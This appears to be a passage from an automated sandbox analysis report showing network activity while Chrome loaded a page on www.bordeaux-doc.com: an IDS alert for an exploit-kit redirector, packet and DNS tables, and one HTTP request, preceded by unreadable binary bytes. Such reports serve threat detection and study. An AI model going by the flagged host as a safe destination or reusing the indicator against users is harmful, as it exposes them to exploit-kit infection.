l..[.....w..........w...........w.............k.........w.Xx........w..........ww..........w...............H.P............(.....w.x.............l..[.....w<...P................w......)....ww..h..........jd../....ww...p......w..........K.....P...........sP.r..N....l..........d../.....ww..4.....N.....<.<...N.w...............h..........0.................O......o.5......w.i.....tG....z.....e.....r.....l....!.......,..........H....H..@...\.`.C......0...:.Q"E..1...0..%C.$).bB. =f.y.#.6..\|x....;

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T10:25:20.149922+0100	2022242	ET EXPLOIT_KIT Evil Redirector Leading to EK Dec 09	1	62.210.16.62	80	192.168.2.4	49740	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 10:25:15.089261055 CET	49675	443	192.168.2.4	173.222.162.32
Jan 15, 2025 10:25:18.225085020 CET	49738	443	192.168.2.4	142.250.185.228
Jan 15, 2025 10:25:18.225111961 CET	443	49738	142.250.185.228	192.168.2.4
Jan 15, 2025 10:25:18.225168943 CET	49738	443	192.168.2.4	142.250.185.228
Jan 15, 2025 10:25:18.225635052 CET	49738	443	192.168.2.4	142.250.185.228
Jan 15, 2025 10:25:18.225645065 CET	443	49738	142.250.185.228	192.168.2.4
Jan 15, 2025 10:25:18.888529062 CET	443	49738	142.250.185.228	192.168.2.4
Jan 15, 2025 10:25:18.888895988 CET	49738	443	192.168.2.4	142.250.185.228
Jan 15, 2025 10:25:18.888915062 CET	443	49738	142.250.185.228	192.168.2.4
Jan 15, 2025 10:25:18.890362024 CET	443	49738	142.250.185.228	192.168.2.4
Jan 15, 2025 10:25:18.890418053 CET	49738	443	192.168.2.4	142.250.185.228
Jan 15, 2025 10:25:18.891741991 CET	49738	443	192.168.2.4	142.250.185.228
Jan 15, 2025 10:25:18.891813993 CET	443	49738	142.250.185.228	192.168.2.4
Jan 15, 2025 10:25:18.932636976 CET	49738	443	192.168.2.4	142.250.185.228
Jan 15, 2025 10:25:18.932656050 CET	443	49738	142.250.185.228	192.168.2.4
Jan 15, 2025 10:25:18.979522943 CET	49738	443	192.168.2.4	142.250.185.228
Jan 15, 2025 10:25:19.493319988 CET	49740	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:19.493752956 CET	49741	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:19.498188019 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:19.498292923 CET	49740	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:19.498583078 CET	80	49741	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:19.498637915 CET	49741	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:19.499151945 CET	49740	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:19.503983974 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.124125957 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.124181032 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.124218941 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.124255896 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.124349117 CET	49740	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.124349117 CET	49740	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.145011902 CET	49740	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.145308971 CET	49741	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.145798922 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.149921894 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.150135994 CET	80	49741	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.150623083 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.150697947 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.150826931 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.155692101 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.192498922 CET	49744	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.192622900 CET	49745	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.197709084 CET	80	49744	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.197782040 CET	80	49745	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.197819948 CET	49744	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.197846889 CET	49745	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.198314905 CET	49744	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.198359013 CET	49745	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.203186989 CET	80	49744	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.203330994 CET	80	49745	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.229783058 CET	49746	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.234796047 CET	80	49746	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.234880924 CET	49746	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.236165047 CET	49746	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.241039038 CET	80	49746	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.330447912 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.330499887 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.330563068 CET	49740	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.332669973 CET	80	49741	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.332707882 CET	80	49741	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.332745075 CET	80	49741	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.332791090 CET	49741	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.547111988 CET	49747	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.547230959 CET	49748	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.552140951 CET	80	49747	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.552155018 CET	80	49748	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.552212954 CET	49747	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.552227020 CET	49748	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.552494049 CET	49747	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.552542925 CET	49748	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.557296991 CET	80	49747	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.557324886 CET	80	49748	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791794062 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791830063 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791841030 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791853905 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791865110 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791877985 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791891098 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.791919947 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791929960 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.791932106 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791944027 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791954994 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.791968107 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.792001963 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.796766043 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.796778917 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.796828985 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.823484898 CET	80	49745	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.823503017 CET	80	49745	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.823574066 CET	49745	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.828893900 CET	49749	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.832904100 CET	80	49744	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.833066940 CET	80	49744	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.833077908 CET	80	49744	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.833146095 CET	49744	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.833790064 CET	80	49749	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.833967924 CET	49749	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.834433079 CET	49749	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.836621046 CET	49750	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.839198112 CET	80	49749	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.841384888 CET	80	49750	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.841445923 CET	49750	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.841597080 CET	49750	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.846467018 CET	80	49750	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.866728067 CET	80	49746	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.884090900 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.890036106 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.894841909 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.895236015 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.900114059 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.900173903 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.900311947 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:20.905061960 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:20.920953035 CET	49746	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.122523069 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.122550964 CET	80	49746	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.122616053 CET	49746	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.128601074 CET	49752	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.133500099 CET	80	49752	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.133583069 CET	49752	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.133732080 CET	49752	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.138530016 CET	80	49752	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.167018890 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.174998999 CET	80	49747	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.175009966 CET	80	49747	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.175076008 CET	49747	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.190264940 CET	80	49748	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.190274000 CET	80	49748	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.190283060 CET	80	49748	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.190346003 CET	49748	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.469554901 CET	80	49749	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.469566107 CET	80	49749	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.469770908 CET	49749	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.470005035 CET	80	49750	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.470016003 CET	80	49750	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.470026970 CET	80	49750	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.470057011 CET	49750	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.509500980 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.509524107 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.509536028 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.509546995 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.509557009 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.509567976 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.509579897 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.509589911 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.509601116 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.509599924 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.509613037 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.509646893 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.509695053 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.511379004 CET	49750	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.514404058 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.514414072 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.514425993 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.514647007 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.558227062 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.596147060 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.636356115 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:21.752506971 CET	80	49752	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:21.792649984 CET	49752	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:28.791152000 CET	443	49738	142.250.185.228	192.168.2.4
Jan 15, 2025 10:25:28.791217089 CET	443	49738	142.250.185.228	192.168.2.4
Jan 15, 2025 10:25:28.791435957 CET	49738	443	192.168.2.4	142.250.185.228
Jan 15, 2025 10:25:30.328620911 CET	49738	443	192.168.2.4	142.250.185.228
Jan 15, 2025 10:25:30.328651905 CET	443	49738	142.250.185.228	192.168.2.4
Jan 15, 2025 10:25:40.330373049 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:40.330568075 CET	49740	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:40.332974911 CET	80	49741	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:40.333034039 CET	49741	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:40.466214895 CET	49741	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:40.466310024 CET	49740	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:40.471579075 CET	80	49741	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:40.471621037 CET	80	49740	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:40.823735952 CET	80	49745	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:40.823913097 CET	49745	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:40.832691908 CET	80	49744	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:40.832840919 CET	49744	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:40.866897106 CET	80	49746	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:40.867108107 CET	49746	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:41.073244095 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:41.073332071 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:41.174300909 CET	80	49747	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:41.174417019 CET	49747	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:41.190226078 CET	80	49748	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:41.190310001 CET	49748	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:41.469558001 CET	80	49749	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:41.469645977 CET	49749	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:41.469659090 CET	80	49750	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:41.469713926 CET	49750	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:41.509727001 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:41.509876013 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:41.753165007 CET	80	49752	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:41.753261089 CET	49752	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.465909004 CET	49747	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.465943098 CET	49748	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.465980053 CET	49749	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.466008902 CET	49750	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.466037035 CET	49751	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.466075897 CET	49752	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.466111898 CET	49745	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.466140032 CET	49744	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.466176033 CET	49746	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.466197968 CET	49743	80	192.168.2.4	62.210.16.62
Jan 15, 2025 10:25:42.470942020 CET	80	49748	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:42.471288919 CET	80	49747	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:42.471303940 CET	80	49749	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:42.471334934 CET	80	49750	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:42.471349001 CET	80	49751	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:42.471364975 CET	80	49752	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:42.471379995 CET	80	49745	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:42.471394062 CET	80	49744	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:42.471407890 CET	80	49746	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:42.471421957 CET	80	49743	62.210.16.62	192.168.2.4
Jan 15, 2025 10:25:46.113343000 CET	50894	53	192.168.2.4	162.159.36.2
Jan 15, 2025 10:25:46.118411064 CET	53	50894	162.159.36.2	192.168.2.4
Jan 15, 2025 10:25:46.118647099 CET	50894	53	192.168.2.4	162.159.36.2
Jan 15, 2025 10:25:46.124013901 CET	53	50894	162.159.36.2	192.168.2.4
Jan 15, 2025 10:25:46.591887951 CET	50894	53	192.168.2.4	162.159.36.2
Jan 15, 2025 10:25:46.597145081 CET	53	50894	162.159.36.2	192.168.2.4
Jan 15, 2025 10:25:46.597223997 CET	50894	53	192.168.2.4	162.159.36.2
Jan 15, 2025 10:26:18.286386013 CET	50986	443	192.168.2.4	142.250.186.100
Jan 15, 2025 10:26:18.286408901 CET	443	50986	142.250.186.100	192.168.2.4
Jan 15, 2025 10:26:18.286492109 CET	50986	443	192.168.2.4	142.250.186.100
Jan 15, 2025 10:26:18.286710024 CET	50986	443	192.168.2.4	142.250.186.100
Jan 15, 2025 10:26:18.286736012 CET	443	50986	142.250.186.100	192.168.2.4
Jan 15, 2025 10:26:18.931480885 CET	443	50986	142.250.186.100	192.168.2.4
Jan 15, 2025 10:26:18.931775093 CET	50986	443	192.168.2.4	142.250.186.100
Jan 15, 2025 10:26:18.931783915 CET	443	50986	142.250.186.100	192.168.2.4
Jan 15, 2025 10:26:18.932950974 CET	443	50986	142.250.186.100	192.168.2.4
Jan 15, 2025 10:26:18.933303118 CET	50986	443	192.168.2.4	142.250.186.100
Jan 15, 2025 10:26:18.933475018 CET	443	50986	142.250.186.100	192.168.2.4
Jan 15, 2025 10:26:18.980097055 CET	50986	443	192.168.2.4	142.250.186.100
Jan 15, 2025 10:26:28.832182884 CET	443	50986	142.250.186.100	192.168.2.4
Jan 15, 2025 10:26:28.832323074 CET	443	50986	142.250.186.100	192.168.2.4
Jan 15, 2025 10:26:28.832381010 CET	50986	443	192.168.2.4	142.250.186.100
Jan 15, 2025 10:26:30.465940952 CET	50986	443	192.168.2.4	142.250.186.100
Jan 15, 2025 10:26:30.465986967 CET	443	50986	142.250.186.100	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 10:25:14.325584888 CET	53	65119	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:14.337899923 CET	53	57621	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:15.501430988 CET	53	54385	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:18.216995001 CET	61959	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:18.217099905 CET	57319	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:18.223810911 CET	53	57319	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:18.224128962 CET	53	61959	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:19.415493965 CET	58987	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:19.415810108 CET	58193	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:19.476336002 CET	53	58193	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:19.492301941 CET	53	58987	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:20.234253883 CET	63976	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:20.235918999 CET	54162	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:20.287513971 CET	53	63976	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:20.309952974 CET	53	54162	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:20.310983896 CET	51148	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:20.365412951 CET	53	51148	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:20.459559917 CET	50246	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:20.459690094 CET	50928	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:20.529406071 CET	53	50246	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:20.546559095 CET	53	50928	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:28.940040112 CET	138	138	192.168.2.4	192.168.2.255
Jan 15, 2025 10:25:32.474432945 CET	53	61974	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:46.112447023 CET	53	49477	162.159.36.2	192.168.2.4
Jan 15, 2025 10:25:46.616877079 CET	60946	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:46.624166012 CET	53	60946	1.1.1.1	192.168.2.4
Jan 15, 2025 10:25:47.696302891 CET	52224	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:25:47.704155922 CET	53	52224	1.1.1.1	192.168.2.4
Jan 15, 2025 10:26:18.278326035 CET	60384	53	192.168.2.4	1.1.1.1
Jan 15, 2025 10:26:18.285448074 CET	53	60384	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 10:25:18.216995001 CET	192.168.2.4	1.1.1.1	0x827d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:25:18.217099905 CET	192.168.2.4	1.1.1.1	0x7de7	Standard query (0)	www.google.com	65	IN (0x0001)	false
Jan 15, 2025 10:25:19.415493965 CET	192.168.2.4	1.1.1.1	0xa28a	Standard query (0)	www.bordeaux-doc.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:25:19.415810108 CET	192.168.2.4	1.1.1.1	0x4172	Standard query (0)	www.bordeaux-doc.com	65	IN (0x0001)	false
Jan 15, 2025 10:25:20.234253883 CET	192.168.2.4	1.1.1.1	0x30d1	Standard query (0)	adriennvendeghaz.hu	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:25:20.235918999 CET	192.168.2.4	1.1.1.1	0xe7ac	Standard query (0)	adriennvendeghaz.hu	65	IN (0x0001)	false
Jan 15, 2025 10:25:20.310983896 CET	192.168.2.4	1.1.1.1	0x45c	Standard query (0)	adriennvendeghaz.hu	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:25:20.459559917 CET	192.168.2.4	1.1.1.1	0x2927	Standard query (0)	www.bordeaux-doc.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:25:20.459690094 CET	192.168.2.4	1.1.1.1	0x2708	Standard query (0)	www.bordeaux-doc.com	65	IN (0x0001)	false
Jan 15, 2025 10:25:46.616877079 CET	192.168.2.4	1.1.1.1	0x4456	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 15, 2025 10:25:47.696302891 CET	192.168.2.4	1.1.1.1	0x3dd9	Standard query (0)	212.20.149.52.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 15, 2025 10:26:18.278326035 CET	192.168.2.4	1.1.1.1	0x8a0e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 10:25:18.223810911 CET	1.1.1.1	192.168.2.4	0x7de7	No error (0)	www.google.com			65	IN (0x0001)	false
Jan 15, 2025 10:25:18.224128962 CET	1.1.1.1	192.168.2.4	0x827d	No error (0)	www.google.com		142.250.185.228	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:25:19.476336002 CET	1.1.1.1	192.168.2.4	0x4172	No error (0)	www.bordeaux-doc.com	pf17-web.online.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 10:25:19.492301941 CET	1.1.1.1	192.168.2.4	0xa28a	No error (0)	www.bordeaux-doc.com	pf17-web.online.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 10:25:19.492301941 CET	1.1.1.1	192.168.2.4	0xa28a	No error (0)	pf17-web.online.net		62.210.16.62	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:25:20.287513971 CET	1.1.1.1	192.168.2.4	0x30d1	Name error (3)	adriennvendeghaz.hu	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:25:20.309952974 CET	1.1.1.1	192.168.2.4	0xe7ac	Name error (3)	adriennvendeghaz.hu	none	none	65	IN (0x0001)	false
Jan 15, 2025 10:25:20.365412951 CET	1.1.1.1	192.168.2.4	0x45c	Name error (3)	adriennvendeghaz.hu	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:25:20.529406071 CET	1.1.1.1	192.168.2.4	0x2927	No error (0)	www.bordeaux-doc.com	pf17-web.online.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 10:25:20.529406071 CET	1.1.1.1	192.168.2.4	0x2927	No error (0)	pf17-web.online.net		62.210.16.62	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:25:20.546559095 CET	1.1.1.1	192.168.2.4	0x2708	No error (0)	www.bordeaux-doc.com	pf17-web.online.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 15, 2025 10:25:46.624166012 CET	1.1.1.1	192.168.2.4	0x4456	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 15, 2025 10:25:47.704155922 CET	1.1.1.1	192.168.2.4	0x3dd9	Name error (3)	212.20.149.52.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 15, 2025 10:26:18.285448074 CET	1.1.1.1	192.168.2.4	0x8a0e	No error (0)	www.google.com		142.250.186.100	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.bordeaux-doc.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49740	62.210.16.62	80	6104	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:25:19.499151945 CET	473	OUT	GET /ville_de_rochefort/Roch/LR/Boya-uk.htm HTTP/1.1 Host: www.bordeaux-doc.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
